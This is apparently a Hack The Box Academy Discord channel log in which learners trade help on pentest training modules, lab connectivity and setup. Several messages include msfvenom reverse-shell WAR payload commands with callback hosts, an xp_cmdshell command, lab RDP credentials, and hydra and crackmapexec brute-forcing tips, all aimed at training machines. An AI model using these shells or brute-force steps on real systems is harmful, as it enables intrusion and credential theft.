#modules

1 messages · Page 205 of 1

ionic totem
#

Hey guys. i have a doubt about how htb works actually. the thing is i wanted to go for CPTS. is there any payment procedure for studying the modules. or is it like just for the certificate examination?

grim mica
#

hey guys i need help my academic email's domain is not in htb current list of valid academic domains I want to get an education discount

jolly jackal
#

where can i start from

#

can anyone help me with this

short hare
#

WINDOWS PRIVILEGE ESCALATION: Windows Privilege Escalation Skills Assessment - Part I
Question:
Find the password for the ldapadmin account somewhere on the system.

I got the NT/Authority cmd but can't find this one. Really getting exhausted
Any help????????

cedar void
#

The results I got back...which is none.

cedar void
heavy marsh
#

Can anyone explain why we change ip value to ;ls; instead of just ls in the web proxy module?

#

They didn't really explain that syntax at all.

compact patrolBOT
jolly jackal
thorn urchin
#

This server doesnt endorse illegal activities and you can face a ban for it. I recommend deleting your messages and being smarter about admitting to shit.

thorn urchin
#

I dont care and neither will mods

jolly jackal
#

ok

jolly jackal
thorn urchin
short hare
prisma spruce
jolly jackal
#

what is base terminal

#

where is it

jolly jackal
#

can anyone help me i stuck in the starting

fathom pendant
#

Utilizing Google and search features will help you.

#

If you've never touched a linux device in your life: diving into hacking is gonna be an uphill fight vs things that are considered "fundamental" and assumed knowledge

jolly jackal
#

hm

jolly jackal
#

i have to wait for the tomorrow

fathom pendant
#

Yes: free users get one spawn of the in-browser vm per day

jolly jackal
fathom pendant
#

Can't walk you through something if you can't view/see it

jolly jackal
#

can you show me how it is done

fathom pendant
#

No

jolly jackal
#

do u have any video of it

fathom pendant
#

This field is full of independent research

#

Learning how to be self-reliant on your own research is important

#

Google is a very powerful search tool

jolly jackal
fathom pendant
#

Then learn how to set up your own vm

#

(Virtual Machine)

limber river
jolly jackal
fathom pendant
jolly jackal
jolly jackal
compact patrolBOT
fathom pendant
#

I don't believe in holding hands through a problem

jolly jackal
fathom pendant
#

No

jolly jackal
#

i search about base terminal in brave but it shows ubuntu for some reason

fathom pendant
#

I dont know you, nor do I have any personal investment in you

fathom pendant
#

Most linux distributions terminal is a universal term

jolly jackal
fathom pendant
#

It, generally, refers to the command line environment in linux

jolly jackal
#

hmm

limber river
jolly jackal
#

thanks for your help :D

languid fjord
#

download parrot ISO

#

then its just standard install

fathom pendant
#

Bashcrawl is a good little game to learn basic commands

limber river
jolly jackal
#

hmm

fathom pendant
#

It's something you can download and run completely in the terminal

#

:)

fathom pendant
#

It even gives you a starting point for the commands

jolly jackal
#

gotta give it a try

#

first i gotta need to download vm and parrot os

jolly jackal
fathom pendant
#

There's a "setting up" module

limber river
languid fjord
limber river
jolly jackal
languid fjord
#

Parrot is gonna be similar to pwnbox though

#

esp the "HTB Edition"

jolly jackal
#

hmm

fathom pendant
languid fjord
#

(thats what pwnbox runs - with a few tweaks)

fathom pendant
#

it's been mostly reliable for me ¯_(ツ)_/¯

jolly jackal
#

ok

fathom pendant
#

Like any OS there's quirks

#

But you can easily overcome or bypass with the application of grey matter

languid fjord
jolly jackal
#

ok

languid fjord
#

If you use another OS i.e. ubuntu, you'll need to install tools manually

#

which is good or bad depending on what your doing

jolly jackal
#

so parrot will be the best

languid fjord
#

But parrot has everything you need for acad

limber river
fathom pendant
#

it's mostly good for its intended purpose ¯_(ツ)_/¯

jolly jackal
fathom pendant
jolly jackal
#

my friend use linux and he told me that it is also good for this things

fathom pendant
#

Kali is too bloated for me, too many default programs that I'll never use at startup

limber river
#

they basically do the same shit , just preference matter

fathom pendant
#

^

#

Some people have shitty experiences with parrot and switch to Kali, and vice versa

jolly jackal
#

hm

#

ok

limber river
#

at the end is not abt which distro you use , it's about ur skills

jolly jackal
#

hm

fathom pendant
limber river
jolly jackal
#

iso
virtualbox
utm

fathom pendant
#

Iso

jolly jackal
#

ok

fathom pendant
#

Or if you're using virtualbox, the virtualbox option

jolly jackal
fathom pendant
#

The virtualbox option is a pre-made one

jolly jackal
#

hmm

jolly jackal
limber river
fathom pendant
#

Meaning you don't really get to make your own user and such

#

The iso can be used to install in vbox

limber river
jolly jackal
#

ok

fathom pendant
#

There's documentation on the parrot website on how to install

jolly jackal
#

ok

fiery sundial
#

im back after a massive break

#

i changed my name alot so idk if u guys remember me

jolly jackal
#

bro tf parrot virtual box is 6.9gb

fathom pendant
#

We don't 🗿

fiery sundial
#

i am still noob 😦

limber river
fathom pendant
jolly jackal
#

gotta need to ask for someone's pass

fathom pendant
#

It contains some settings and such for it to be imported into vbox

jolly jackal
#

hmm

jolly jackal
fathom pendant
jolly jackal
#

hmmm

#

got it

#

thx :)

earnest mulch
#

the Parrot instance on active directory freezes over SSH every 5 mins

#

like I swear why would I need to ssh to do stuff with the windows instance?

fathom pendant
#

In some instances rdp is disabled or a user you gain access to doesn't have remote desktop privs

#

(They may have remote management privs though through rm/ssh)

earnest mulch
#

fucking hell there is no academy server in SEA

fathom pendant
#

At least not currently

#

There's a pwnbox server there, so maybe they'll expand the vpn servers for academy there

earnest mulch
#

so maybe I would need to dump the output by redirecting stdout into a text file

clever topaz
#

if i purchase student sub, do i get cubes for completing the tier 1-2 modules

fathom pendant
#

Yes

grave cloud
#

Hi buddy's

blissful pilot
#

can an1 help with installing kali linux

#

its saying inaccesible i can't even start it and its cuased by a machinwrap apperantly if an1 can help lmk

earnest mulch
#

whose idea is it was to hide the damm Windows VM behind another SSH linux machine?

blissful pilot
#

idk

limber river
#

am the only one who face rdp problems ?

short hare
limber river
short hare
rose swallow
#

any hint?

limber river
languid fjord
limber river
#

maybe because the windows version is too old

languid fjord
#

Ah, okay

#

I still suggest reaching out to support if you run into issues but I'll pass along that the module is causing issues

limber river
languid fjord
#

I understand, from our side it helps us understand where the issues are.

low girder
limber river
low girder
limber river
low girder
#

Same on other VPN servers?

limber river
next bronze
#

I don't remember having problems with that but yeah it's windows server 2008

languid fjord
limber river
earnest mulch
earnest mulch
#

yeah

languid fjord
#

Kk, thank you

earnest mulch
#

every 5 sec it freezes and like a mins later the server would send the echo back

autumn pilot
#

have you reached out to support?

limber river
earnest mulch
limber river
languid fjord
#

Yeah that's dif :p

#

Alll good though, I'll pass it along

low girder
earnest mulch
languid fjord
#

Any errors or?

#

Is it disconnecting?

earnest mulch
low girder
autumn pilot
#

Please reach out to support and don't turn this channel into troubleshooting vpn connectivity issues

earnest mulch
#

yeah alright

earnest mulch
compact patrolBOT
low girder
#

I'll reach out there

#

@limber river
xfreerdp /v:10.129.32.4 /u:htb-student /p:HTB_@cademy_stdnt! /tls-seclevel:0 /timeout:80000

limber river
patent jungle
#

Hi, wanted to ask how much time it takes to complete the Penetration Tester learning path

limber river
#

it's really depends on ur lvl , how much time you dedicate for it , so no one can answer

patent jungle
soft cedar
patent jungle
patent jungle
soft cedar
limber river
patent jungle
#

Ah okay, thanks a lot you guys!!

soft cedar
#

Tbh you should just do it at yo own pace.

mystic thicket
#

Hello, can someone give me hints for Intro to whitebox pentesting skills assessment? I have located a possible injection point, but I just can't get a working payload. You can DM me, and I can provide more information.

limber river
limber river
random bolt
#

I have a question regarding host from offshore lab, is this the right channel to post the question? i am new to discord channel of HTB.

patent niche
#

Hard to do any modules when the spawn machine is unstable sadglas

limber river
obsidian belfry
#

Has anyone completed the Attacking Authentication Mechanisms yet? Currently stuck on OAuth brute forcing weak access tokens. Found many ||tokens|| but can't move forward.

edit: solved

dawn matrix
#

Hello, I have some issues with the labs. There are slow, and even reseting the target/ changing the VPN doesn't change anything. Does anyone have a fix ?

patent niche
paper basalt
pearl solar
#

hey

#

i just joined

#

idk what to do

patent yacht
#

i am stuck at somethin

WINDOWS EVENT LOGS & FINDING EVIL

Tapping Into ETW

i trun silketw on and then start seatbelt after this i check the etw.json file amd iit just gives me a billion ProviderGuid with no ManagedInteropMethodName at all

tranquil axle
tender acorn
#

I wan't add my progress in the academy on my CV.

i create a student id in the settings.
But how i addit it?
It is only HTB-xxxxxxxxxx not a link. There stand sum thing over an api where i can find the api

next bronze
#

you can get a transcript in your account settings, that's about it

tender acorn
#

i know but there are as second option the student id

next bronze
#

imo if the employer doesn't know about htba, they aren't gonna care. if they know about it, providing the transcript is easy enough shrug

#

it's like the top 1% thm thing, no one really cares about it

#

you need a unique token to view the information so I guess an org has to request one or something

placid edge
#

what the hell even is this

[06:14:02:752] [9892:9893] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[06:14:02:752] [9892:9893] [WARN][com.freerdp.crypto] - CN = MS01.INLANEFREIGHT.LOCAL
[06:14:13:080] [9892:9893] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[06:14:13:082] [9892:9892] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]
#

i have a user that can rdp i cant rdp

#

-_-

#

12 packets transmitted, 9 received, 25% packet loss, time 11764ms 😄

next bronze
#

eu 1 works fine

#

did you just started the target? give it a bit to spawn

tender acorn
#

o ok

patent niche
#

I give up I can't study like this, probably going to wait today

placid edge
#

on tcp on eu 1

placid edge
#

99.79% done

#

yesh

wheat edge
#

Hey there,

Does anyone know how I can access the module finished page that comes up, once I finish a module? It has some interesting information which I would like to access at any time and not just once after I finished a module.
The URL is https://academy.hackthebox.com/module/finish but only works dynamically.

zenith mango
wheat edge
zenith mango
#

I don't think you're stupid dude. I ran into the same issue when I first started the course, and thats the only way I've seen to get back to that completion page. I try to go back and do the suggested boxes for more practice when I get tired of going through modules.

wheat edge
#

yea, that's what I wanted it for also.

deft escarp
#

Im in the RDP and SOCKS tunneling with SocksOverRDP section of the pivoting and tunneling module. The issue im having is that the last ip im supposed to get to.:172.16.6.155 (jason:WellConnected123!). Isnt reachable from the windows host we have access to. Also the host used in the example, is reachable but has seperate credentials that i dont have.

wheat edge
#

Also a question to the sqlmap Essentials module. Does anybody have an idea what the injectable query of case7.php?id=1 looks like in the code? I had no problem solving it, but toying around with the vector and the boundaries, it behaves in a way that does not make sense to me. I always try to think about the query and the position of the injection, when I try to find SQL injections. But with this one, I have no freaking clue where in the SELECT statement I am injecting into.

I normally look up the syntax of the query and think about, where the injection point might be. For this I take the syntax e.g. for MySQL from https://dev.mysql.com/doc/refman/8.0/en/select.html.

patent niche
#

they are hard to follow true, specially when the RDP on windows is slow xD

placid edge
#
#

damn

placid edge
#

damn htb. Stop making me more nervous here

placid edge
languid fjord
#

VPN is above 😛

low girder
#

F. I'm blind.

cedar void
#

So for the ||172.16.6.0/24 subnet from the AD enumeration and attacks assessment and I found 3 internal IP addresses for that subnet:

nmap scanned all 3 internal IP addresses and 2 came back with different services.

I tried logging into one of the internal ip addresses on that subnet with the xfreerdp tool(and initially using the credentials in the module) and it came back with an error.

So I would likely need to find the credentials using the netexec tool and I would likely need to use a mutated password list and username list(like the ones found in the password attacks module??)||

https://academy.hackthebox.com/module/143/section/1278

valid pagoda
#

Hey mods just a heads up- the pycrypto package in this bash script (https://academy.hackthebox.com/module/112/section/2117) no longer seems to work with the latest version of python3, looks like it hasn't been updated in at least ten years. If the pycrypto package fails installation the rest of the packages on that line (passlib, python-libnmap)fail installation too and have to be installed individually. However, this(https://pypi.org/project/pycryptodome/) is a fork of that package and seems to be working so far (able to run odat.py -h)

nova nest
#

MODULE: ATTACKING COMMON SERVICES

📢 Hey everyone! 👋

I've been on the hunt for the mssqlsvc user in our database since yesterday, but no luck so far. I've gone through the usual spots like sys.database_principals and a few others, but it's like looking for a needle in a haystack. 😅

If anyone has a friendly hint or knows a corner I might not have checked yet, I'd really appreciate the guidance! 🙏 A fresh perspective could be just what I need.

Thanks a bunch in advance! 🌟

#

This is supposed to be the easy part, yet I can't find any user or any entry that looks like a hash.

nova nest
#

SQL Databases (Attackin SQL Databases)

brittle arch
#

Hi Guys , I am stuck at Password Mutation section , I have created mutated password list from the resources and I tried to Hydra the FTP and Crackmapexec SMB with no luck , The Vm just terminates , Can anybody shed some light? Thanks

soft cedar
nova nest
#

i am enumerating since yesterday, but i cant find shit... i mean it cant be that hard, i missing something obvios

brittle arch
#

Tried ssh brute but it was even slower

soft cedar
soft cedar
nova nest
#

i tried the commands yes.

soft cedar
next bronze
soft cedar
brittle arch
#

It has FTP , SMB & SSH

soft cedar
#

I did get mine through ssh tho. But it took forever.

brittle arch
next bronze
soft cedar
#

^

soft cedar
nova nest
#

please give me a gun to shoot myself.... what the hell i should read the modules instead of freestyling it

soft cedar
brittle arch
next bronze
#

ssh can't handle too many threads, the default is 4

soft cedar
#

yup, Same as rdp.

rustic sage
#

So I have read only to id_rsa. I run VIM on it - how do I save the file directly to my machine>?

nova nest
soft cedar
rustic sage
#

I did end up doing that, was wondering if there was another way

#

But thanks 🙂

wintry iris
#

Hi , I am doing the final engagement of the "shells&payloads" module, attacking the 1st target now.

msfvenom -p java/shell_reverse_tcp lhost=172.16.1.5 lport=1234 -f war -o shell.war
172.16.1.5 is the IP address of my foothold machine
I deployed the webshell and tried to access it, but got HTTP 500 error, anyone knows the reason?

wintry iris
#

yes

atomic ruin
#

any tips to deal with the sluggishness that is the AD module? spend more time to input any command than actually running anything

wintry iris
atomic ruin
#

using the pwnbox

soft cedar
atomic ruin
#

already using the closest to me now, everything in the pwnbox is fine, really just from there to the target. even ssh is really slow

soft cedar
wintry iris
#

ok, thanks

soft cedar
# wintry iris ok, thanks

you should try a different payload specifically jsp

msfvenom -p java/jsp_shell_reverse_tcp LHOST=xx.xx.xx.x LPORT=xx -f war -o revshell.war

that should work

rustic sage
#

Thanks for the help with VIM, finally got root. Turns out I was messing up the copy and paste with VIM somehow

wintry iris
soft cedar
wintry iris
#

ok

soft cedar
#

glad to help

wintry iris
#

when I list the payloads of exploit(multi/http/tomcat_mgr_upload) , I did see "java/jsp_shell_reverse_tcp", not sure why it then said it's not compatible...

soft cedar
#

I think you needed to use show targets option but I am not sure

rustic sage
#

Not going to lie.. this acadmey course is so good

wintry iris
#

only one target,

Exploit target:

Id Name


0 Java UniversalExploit target:

soft cedar
wintry iris
#

yeah, manual upload works

#

but how do you know we have to use the JSP one? you tried one by one?

plucky latch
#

Anyone have a few minutes and familiar with the File Uploads assessment? Long story short, trying to get upload.php and successfully injected my SVG code, output is huge, but there are extra characters it, so base 64 decoding it is proving to be a challenge, just need to know what portions of my received output I have to decode

soft cedar
wintry iris
plucky latch
grand rampart
#

Hi

hot heart
#

Does anyone know why it is taking a millennium to load anything within zap

uneven pecan
#

Hi, I'm working through the "Introduction to deserialization" module Page 7 (tools of the trade). The challenge says " Using PHPGGC, obtain RCE on the target and submit the user-id of dnsmasq". I have a reverse shell but I actually don't have a clue what it's wanting. Either I'm being a complete dumb dumb or the question isn't very clear at all. Don't suppose anyone is able to advise?

hot heart
wintry iris
#

a general question
if I know a module exists in MSF, like "/usr/share/metasploit-framework/modules/exploits/123456.rb"
but I cannot find the module with "search" command, is there a way that I can specify the module with the absolute path in MSFConsole?

scarlet jewel
#

Question about the File Transfer module of CPTS

For the linux file transfer, it is advised that we run
sudo python3 -m pip install --user uploadserver
While I understand they want this module to be ran as root to bind to the 443 port, hence the root install, is it a good-enough reason to advise pip to be ran as root?
At the end of the day, we could install the package as a non-root user and bind to port 4444 for example.
Am I missing something?

fathom pendant
wintry iris
#

also tried "use absolute_path", it doesn't work either

fathom pendant
urban wadi
#

marcie

fathom pendant
next bronze
#

the error seems to suggest your reg save is empty

#

did you transfer them correctly

urban wadi
#

do you know how to turn off the pretty chrome dev tool http request crafter and make it raw?

soft cedar
uneven pecan
#

Any staff able to help?

"Introduction to deserialization" module Page 7 (tools of the trade). The challenge says " Using PHPGGC, obtain RCE on the target and submit the user-id of dnsmasq". Revshell is simple but i'm not sure what the question is actually after?

wintry iris
fathom pendant
#

It's not asking for a revshell btw, just rce

#

And how would one get the user-id

uneven pecan
#

there is no user "dnsmasq"

fathom pendant
#

Perhaps it's a service

uneven pecan
#

if that's the case then the question could definitely be clearer. Do services have user-ids?

next bronze
#

that's what the error means, make sure the path is correct

fathom pendant
wintry iris
#

reload_all and search solve the issue

uneven pecan
teal delta
#

I'm currently doing the file transfer module and I cant connect via RDP to the windows machine:

fathom pendant
errant elbow
#

Hi guys, need help for Attacking Thick Client Applications in module Attacking common applications => i'm trying to get the creds out of restart-service.exe, however I cant find the DOS MZ executable in the memory map view, so i cant dump it

upper ruin
#

Hello my dear HTB people.

Got a question on the RDP and SOCKS Tunneling with SocksOverRDP in the Pivoting module.
So: I transferred the .dll, however even when I tried to run it as admin it didn't work.

ember coral
upper ruin
#

Ohh, user account/

#

Aight, will do.

fast olive
#

hey guys! I am new to HTB. I wanna solve the Survival of the Fittest challenge but I'm not getting how to. I started an instance and it gave me the following docker host 83.136.252.214:55914. What am I supposed to do with this? It's a blockchain challenge and I need to interact with the smart contracts.

This article here also didn't prove much help.

teal delta
#

@fathom pendant I've restarted the box and tried with ' instead of " in my local terminal without the pwnbox. It worked thx

fast olive
#

what's the right one?

fathom pendant
#

This channel is for academy modules, read #welcome

fast olive
fathom pendant
patent niche
#

Malware module is the best one when the RDP is running SLOW xDxD 🤡

grand rampart
#

Real world incident report how to use my workstation

outer urchin
#

Hey everyone, I am doing the Live Engagment section of the Shells & Payloads module. In order to continue I have to login to the target machine's tomcat manager. The hint provides the creds to get in, but would I be able to find these creds without using the hint? I've looked through smb shares and found nothing. It's a little cheesy if they force you to look at the hint to get the creds.

outer urchin
#

WOW haha how'd I miss that

fathom pendant
#

I swear this question has been asked like at least a dozen times

#

You can likely search it in the discord

plucky latch
#

OK, time for a humblebrag, took me 12 hours and at end, I changed my process entirely, used a different way to upload the file without using Burp which was giving me headaches... I learned my lesson if at first you dont succeed , try a different technique instead of trying again using same processes...

maiden field
#

Im on the Intro to Assembly Language Conditional branching and trying to solve this question: "The attached assembly code loops forever. Try to modify (mov rax, 5) to make it not loop. What hex value prevents the loop?" I have stopped the loop but I don't think I understood what hex value is it trying to ask off of me. Need some clarification and guidance on the matter

paper basalt
#

Any tips as to how long it approximately takes to crack username/pw on Password Attacks Skills Assesment Easy once you pick the correct username/password list?

#

Same as earlier challs in this module (very quick once correct wordlist is found)?

plucky latch
tawdry vapor
#

Could someone help me, I have an exercise from the academy, several people have already confirmed that the answer is correct, but the exercise is not accepting

plucky latch
#

DM me

native turtle
#

Hi guys I'm stuck in the attacking common application module, in particular on attacking splunk, I followed the lessons, changed the run.ps1 with my ip address but cannot spawn a reverse shell when I upload the tar.gz file... any help?

lost juniper
#

Hey guys can anyone help me with getting back a full shell in Playing Pong with Socat?

#

im really stucked and i am getting back a revershell over der Pivot host, but the shell is always closing (Problem is solved)

shell ore
#

am i the only one facing summoning issues? 🥲

fathom pendant
fathom pendant
shell ore
fathom pendant
#

Ofc can't forget wispot

shell ore
#

i cant keep drinking anything u give

fathom pendant
#

Wisdom

shell ore
shell ore
#

mana didnt work sadglas

raven lagoon
#

that Password Attacks module was so fking boring man

shell ore
fickle pike
#

free

#

the palestine

#

🇵🇸

rich lagoon
fathom pendant
rich lagoon
#

question

fickle pike
#

yes

fathom pendant
placid otter
#

bro got denied

rich lagoon
fathom pendant
rich lagoon
shell ore
#

YOU REPRESENT NO ONE BUT YOUR SELF

pearl torrent
#

How does one "shut your fuck up"

placid otter
#

stop typing

fathom pendant
placid otter
#

yk valid

fathom pendant
pearl torrent
#

Guess they found out how 🤣

fathom pendant
#

I almost did a pre-emptive ping earlier tbh bc I could almost predict it

rich lagoon
#

there we go

#

ok

fathom pendant
rich lagoon
# fathom pendant Answer

why would I esculate that to a tier 2/3 analyst? I picked "Nothing Suspicious" but was wrong. the way i see it, someone tried to login, it failed, and quit to go get their account fixed or something.

fathom pendant
#

That by itself can be suspicious

#

The keyword being here [disabled]

#

It's not a lockout, it's a user account that's been disabled

sleek moss
#

1> EXECUTE('EXEC xp_cmdshell 'dir ''C:\Users\Administrator\Desktop'' /B'';') AT [LOCAL.TEST.LINKED.SRV] ]
2~ go
3~

#

why dont it work it just nothing popping up

#

its not frozen

#

but no command work?\

sleek moss
#

oh i c how do i cance that cmd

fathom pendant
#

Ctrl-c

rich lagoon
fathom pendant
#

I'm sure you can click on the event to learn more

sleek moss
#

also how do u kno its open quote and how wud u quote it properly?

fathom pendant
rich lagoon
patent yacht
#

i did

astral inlet
#

ipv6 looks suspicious ?

rich lagoon
cedar void
#

I have no idea why my ligolo IP is down.

I tried restarting my Virtual box and reseting IP with "sudo ip link set ligolo up " but no luck.

patent yacht
astral inlet
quasi wave
#

I'm having trouble with snmp. I brute force community strings but when I do that I get this output and I don't see a community string there:

10.129.74.233 [public] Linux NIX02 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64

This is for SNMP section of footprinting module.

#

I don't get why I get output but not a community string even when brute force?

#

can someone help?

quasi wave
#

hold on

quasi wave
languid fjord
#

You mean why is that important?

quasi wave
#

right well I mean why is it important that its public if I can't access from web browser? can I do it with nmap?

#

will nmap get me results I need?

#

hold on I played with nmap and now its listing various services on it

languid fjord
#

You can connect to snmp via snmpwalk and other tools

#

And you can read/write depends on the permissions of the community to the system settings

hot heart
#

Web Proxies module, "Try using request repeating to be able to quickly test commands. With that, try looking for the other flag."

As of right now I am looking through the nodes_modules directory, does anyone know if I am on the right track?

#

I've looked at all the other content within the flag.txt directory to no avail. nodes_modules is the only directory that seems to lead anywhere

#

but then again I am having trouble accessing the contents within nodes_modules and public

quasi wave
#

I am trying this and its not working:

┌─[us-academy-2]─[10.10.15.167]─[htb-ac-605555@htb-pirblr2j73]─[/usr/share/SecLists/Discovery/SNMP]
└──╼ [★]$ snmpwalk -v2c -c [public] Linux NIX02 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64
NIX02: Unknown Object Identifier (Sub-id not found: (top) -> NIX02)
┌─[us-academy-2]─[10.10.15.167]─[htb-ac-605555@htb-pirblr2j73]─[/usr/share/SecLists/Discovery/SNMP]
└──╼ [★]$ snmpwalk -v2c -c NIX02 10.129.74.233
Timeout: No Response from 10.129.74.233
#

will read link you gave emma but I'm wondering if I need to or if I am on right path and getting one minor thing wrong

#

or if I'm doing everything wrong because I'm missing something

#

this also hasn't worked:

┌─[us-academy-2]─[10.10.15.167]─[htb-ac-605555@htb-pirblr2j73]─[/usr/share/SecLists/Discovery/SNMP]
└──╼ [★]$ snmpwalk -v2c -c Linux NIX02 10.129.2.26
snmpwalk: Unknown host (NIX02) (Invalid argument)
#

is anyone able to help?

raven lagoon
#

Im doing hard lab in Password Attacks module, im trying to log-in with Johanna user but im not able to find the pwd, do i have to do boring stuffs like searching the db of previous machine?

crystal steeple
languid fjord
#

Nothing more

quasi wave
#

ok

#

so I should enter the word public into it?

raven lagoon
languid fjord
#

-c public

quasi wave
#

ok thanks

crystal steeple
raven lagoon
#

both hydra cme

#

hydra didnt work gave me errors

crystal steeple
#

cme should be able to crack it

#

try the mut_password.list wordlists

#

it should work

raven lagoon
#

i did bro

crystal steeple
#

i just cracked it yesterday using that wordlist and crackmapexec :3

#

how many lines does your mut password list has?

raven lagoon
#

94044

crystal steeple
raven lagoon
#

blud

crystal steeple
#

just try again with crackmapexec and wait for it lol

raven lagoon
#

i cannot even use multithreads 💀

hot heart
#

I am searching through the node_modules directory, am I wasting time or am I on the right track

crystal steeple
#

its wont take more than 10min i guess prayge

raven lagoon
cedar void
#

Do you have to use the rockyou.txt password list on the kali machine or do you create your own mutated_password list for the AD enumeration and assessment part 1 box

raven lagoon
#

keypass pwd doesnt work omfg

fathom pendant
hot heart
#

Hey @fathom pendant do you know if I am on the right track for web proxy module burp repeater section

#

I've been looking through all the content inside the node_modules directory to no avail, I've already looking through the "Public" directory as well to no avail. Am I on the right track ?

lusty thicket
#

maybe you can use the find cmd

hot heart
#

I was going at it for about 2 and a half hours straight, imma get a snack real quick, and then I’ll update u @lusty thicket

indigo locust
#
Examine the third target and submit the contents of flag.txt in C:\Users\Administrator\Desktop\ as the answer. ```

I cant find a user and password by using crackmapexec, evil-winrm, and hydra by using the user and mutated passowrd list given in module. Any tip to navigate me in right direction?
fathom pendant
indigo locust
crystal steeple
#

i cant mount the

#

||Backup.vhd||

#

i tried doing it with guesmount as i saw in a blog but it shows the file format is unknown not ntfs

#

when i transfer the .vhd to my machine through smb its doesn't transfer all contents?

raven lagoon
#

cant you just get *?

crystal steeple
#

but it doesnt transfer all contents

#

so when i try to mount the .vhd file i fail

#

i've been stuck in this hard lab for 2 days rn lol

#

did you manage to mount the vhd file?

raven lagoon
#

no

crystal steeple
raven lagoon
#

isnt it encrypted?

indigo locust
crystal steeple
raven lagoon
#

doesnt seem so btw

#

@crystal steeple

crystal steeple
#

bruh i cant get that file

crystal steeple
raven lagoon
#

come pvt i found smth

crystal steeple
#

finally finished the daunting password attacks module

#

feels like i got the cpts lol

fickle sparrow
#

who is down to do a easy machine together?

arctic pulsar
#

Hey guys, I need a little help with nmap module

#

I'm in the firewall evasion section in the academy and I'm trying to run a stealth scan. It wants me to find the OS running on the target, and the hint states that admins in this scenario don't want hosts in the same subnet talking to each other, so naturally I run a scan to find other hosts that I can use to spoof my scan.

However, when I try run my scan with the -S and -e flags I get an error stating nmap "failed to determine a route to [target]. Am I missing something here?
I know that the decoy IP needs to be alive so I ran a scan for other active hosts on the network, but no matter what IP I use I get the same error. Anyone have experience with stealthy nmap scans can maybe give me some pointers?

fathom pendant
#

Also spoofing is not required

arctic pulsar
#

If I can't spoof, then what would be the next option? A decoy?

#

I'm assuming the module wants to practice what I've learned but I don't think it's clicking yet

arctic pulsar
lusty thicket
arctic pulsar
#

You're right

#

The answer was right in my face, nvm

normal panther
#

Path Bash Scripting; Module Comparison Operators:
Create an "If-Else" condition in the "For"-Loop that checks if the variable named "var" contains the contents of the variable named "value". Additionally, the variable "var" must contain more than 113,450 characters. If these conditions are met, the script must then print the last 20 characters of the variable "var". Submit these last 20 characters as the answer.

#

I know i have done something wrong with the first if comparison parameter what else?

grizzled hornet
#

👏

jolly jackal
#

how can i know if all my ports are closed?

short hare
#

netstat -ano

jolly jackal
#

what will happen if i close all my ports

#

hey

next bronze
#

but why, some services need them open

#

your pc is likely behind a router anyways

jolly jackal
#

and the rest should be closed

next bronze
#

you don't really need to manage the ports if it's your personal machine

#

what are you trying to accomplish

fathom pendant
#

You only really need to worry about ports if they're exposed to the internet.

languid fjord
#

your router is what blocks external access

limber river
#

in the windows PE skillAssessment 1 , is it intended to answer the questions in order ? || I needed system privileges to answer the second question ?||

jolly jackal
jolly jackal
#

I just saw a video of ebola man in which he used angryip scanner to get ip and somehow he got a open port of 445 or somthing like that and then he window shares and he got to see his system files

languid fjord
#

if you havent opened the port on your router

#

no one from outside your home network can connect

next bronze
jolly jackal
#

hmm

languid fjord
#

Outbound ports are what you use to connect to the internet

jolly jackal
languid fjord
#

inbound ports is what people use to connect to you

languid fjord
jolly jackal
#

i use mobile hostpot

#

💀

next bronze
#

if you haven't mssed with the router ports you're gonna be fine

jolly jackal
jolly jackal
#

i don't want a random guy to check my system files

jolly jackal
languid fjord
#

dont open ports on your router

jolly jackal
spark zephyr
jolly jackal
languid fjord
#

If you didnt manually open it

#

its not open

jolly jackal
#

but still in angryip scanner shows that one of my port is open

signal bloom
#

guys i am new to cyber security and what did u recommend me to excell in it

jolly jackal
acoustic owl
jolly jackal
#

i do not have router

acoustic owl
#

It doesn't matter

jolly jackal
acoustic owl
jolly jackal
#

i use mobile hostpot

acoustic owl
jolly jackal
#

never knew this

acoustic owl
#

Your PC has an address such as 192.168.x.x, 172.16-32.x.x, 10.x.x.x?

jolly jackal
jolly jackal
acoustic owl
jolly jackal
acoustic owl
jolly jackal
next bronze
#

it's 127.0.0.1

jolly jackal
#

how did u did that

jolly jackal
#

teach me man

jolly jackal
next bronze
#

then google

jolly jackal
#

ok

jolly jackal
#

bro am getting bullied here just because i don't know hacking

acoustic owl
jolly jackal
spark zephyr
acoustic owl
jolly jackal
next bronze
#

128 bits is too much

spark zephyr
jolly jackal
next bronze
#

google

acoustic owl
jolly jackal
next bronze
spark zephyr
#

based that you referenced an RFC.

jolly jackal
next bronze
#

how is refercing an rfc mean you're a c dev

jolly jackal
#

just installing parror os might take some days

next bronze
acoustic owl
next bronze
#

if it's about that question unfortunately I don't remember

limber river
next bronze
#

I think I've seen some people say that tho

jolly jackal
next bronze
#

not sure how I did it, it's close to a year ago now

jolly jackal
#

as a heading

limber river
next bronze
#

yeah IAmABoomer

jolly jackal
#

can you tell me i wanna choose the right thing for netwroking

limber river
fathom pendant
#

the basics of it

jolly jackal
#

ohh

jolly jackal
#

like the interest but i know nothing about any of those area

limber river
jolly jackal
#

like exploit and those stuff

jolly jackal
#

while choosing the area of your interest

#

idk how i got log out from that acc

limber river
jolly jackal
#

which one should i choose

#

i never heard the area of those name

fathom pendant
#

those questions don't generally matter

jolly jackal
#

hmm

fathom pendant
#

you can not answer them, they don't give you any special access to anything

#

also a lot of the terms can be googled

limber river
jolly jackal
jolly jackal
limber river
jolly jackal
#

hmm

fathom pendant
#

You can also just not answer the question

#

lol it's not a requirement to answer those questions

limber river
#

you wanna be hacker , google is your friend

raven lagoon
fathom pendant
#

not like they know if it's the actual truth ¯_(ツ)_/¯

jolly jackal
#

hey guys i wrote uname -a in parrot terminal

#

and got something which wrote dynamic

#

what will the answer of the question

#

Based on the commands you executed, what is likely to be the operating system flavor of this instance? (case-sensitive)

#

what does this even mean

next bronze
#

read the section and answer it yourself

jolly jackal
#

ok

jolly jackal
fathom pendant
#

also pretty sure you're meant to ssh to a target for this section

jolly jackal
#

what is ssh

fathom pendant
#

a connection protocol

jolly jackal
limber river
fathom pendant
#

again a lot of your questions can be Googled

#

ask google before you ask here

jolly jackal
#

is just said write uname -a in base terminal

fathom pendant
#

intro to linux?

limber river
jolly jackal
#

hmmm

fathom pendant
#

well "linux fundamentals" i should say

jolly jackal
#

ok

